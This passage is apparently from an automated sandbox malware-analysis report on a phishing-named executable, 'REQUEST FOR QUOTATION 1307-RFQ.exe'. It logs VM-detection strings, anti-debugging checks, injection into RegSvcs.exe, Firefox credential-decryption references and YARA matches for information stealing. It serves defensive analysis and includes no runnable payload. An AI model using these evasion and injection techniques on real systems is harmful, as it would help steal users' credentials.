              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595042Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594932Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594652Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594545Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594423Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594062Jump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: SensorDataService.exe, 0000000D.00000003.1766297686.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device^
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\System32\DDORes.d
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V GenerZ
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000000F.00000002.2932590100.000000000061E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
              Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: SensorDataService.exe, 0000000D.00000003.1766237858.0000000000525000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766027536.0000000000523000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766130152.0000000000523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverT_R
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
              Source: SensorDataService.exe, 0000000D.00000003.1868494320.0000000000526000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fRSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000r
              Source: Spectrum.exe, 0000000F.00000002.2932590100.00000000005E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver0
              Source: armsvc.exe, armsvc.exe, 00000001.00000003.1764615708.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744374270.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1700090715.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000513000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1787833762.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
              Source: Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: snmptrap.exe, 0000000E.00000002.2920808237.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000011.00000002.2927597319.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000513000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1787833762.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
              Source: SensorDataService.exe, 0000000D.00000003.1766297686.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Net<
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685534324.0000000000C94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS-~%
              Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
              Source: Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
              Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
              Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000523000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766130152.0000000000523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
              Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000523000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766130152.0000000000523000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1787833762.0000000000640000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
              Source: SensorDataService.exe, 0000000D.00000003.1766297686.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: RegSvcs.exe, 00000002.00000002.2939718488.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllolel%l
              Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-108725
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-109067
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00539594 mov eax, dword ptr fs:[00000030h]0_2_00539594
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00AE1130 mov eax, dword ptr fs:[00000030h]0_2_00AE1130
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B23F3D mov eax, dword ptr fs:[00000030h]0_2_00B23F3D
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00C934F8 mov eax, dword ptr fs:[00000030h]0_2_00C934F8
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00C93558 mov eax, dword ptr fs:[00000030h]0_2_00C93558
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00C91E78 mov eax, dword ptr fs:[00000030h]0_2_00C91E78
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_00951130 mov eax, dword ptr fs:[00000030h]11_2_00951130
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 11_2_00993F3D mov eax, dword ptr fs:[00000030h]11_2_00993F3D
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B21361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B21361
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B24C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B24C7B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 83C008Jump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: Shell_TrayWnd
              Source: Acrobat.exe.1.drBinary or memory string: REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 IS_COEX_REPAIR=1 /qn/qb REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 BROADCASTCEFRELOAD=1 \/0\*cef_*/qn CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /i msiexec.exe/i ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn.msiexec.exe/i ADDLOCAL=OptionalFeatures,DistillerCJKNative,DistillerCJKSupport,PaperCaptureOptional,PreFlightPlugin DISABLE_FIU_CHECK=1 TRANSITION_INSTALL_MODE=4 SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn\msiexec.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList\MRUListAcrobat.exeMRUListAppDoNotTakePDFOwnershipAtLaunch\\\AppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\RtlGetVersionntdll.dllAdobe Systems, IncorporatedAdobe Inc.Adobe Systems Incorporated1.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1kernel32IsWow64ProcessSystem\CurrentControlSet\Control\CitrixProductVersionNumSoftware\Adobe\Acrobat\ExeSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770/\Click on 'Change' to select default PDF handler#32770ADelRCP.exepropertiesClick on 'Change' to select default PDF handler.pdfShowAppPickerForPDF.exeProgram ManagerPROGMANApplicationClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#3277012Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice.0Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice\InstallerSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfSOFTWARE\Adobe\Acrobat Reader\12{A6EADE66-0000-0000-484E-7E8A45000000}{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinorVersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\.0SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\PATHVersionMajorVersionMinor7760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderDCSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\\InstallerSOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\ENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdf{AC76BA86-0000-00
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTBF36.tmp VolumeInformationJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTBF47.tmp VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
